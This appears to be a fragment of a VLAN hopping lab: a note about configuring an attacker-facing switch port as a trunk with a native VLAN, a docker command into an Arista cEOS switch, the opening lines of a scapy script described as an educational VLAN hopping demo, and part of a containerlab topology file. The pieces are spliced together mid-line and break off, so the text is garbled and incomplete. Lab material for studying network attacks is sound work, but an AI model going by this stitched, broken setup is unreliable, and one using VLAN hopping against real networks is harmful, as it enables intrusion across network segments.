Switch connected to the attacker. Configure eth1 as a trunk port with native VLAN (vulnerability).
# Enter SW1 console
docker exec -it clab-vlan_hopping_lab_sw2-sw1 Cli
# cEOS Configuration
enable| #!/usr/bin/env python3 | |
| """ | |
| VLAN Hopping Attack Demo (Educational Purpose Only) | |
| Demonstrates single-tagged VLAN hopping exploit | |
| """ | |
| from scapy.all import Ether, Dot1Q, IP, ICMP, sendp | |
| def main(): | |
| print("[DEMO] Sending single-tagged ICMP packet (VLAN 20)...") | |
| name: vlan_hopping_lab_sw2 | |
| topology: | |
| nodes: | |
| sw1: | |
| kind: arista_ceos | |
| # Note: Adjust this image tag to match the tag you used for docker import | |
| image: ceos:4.34.0F | |
| sw2: |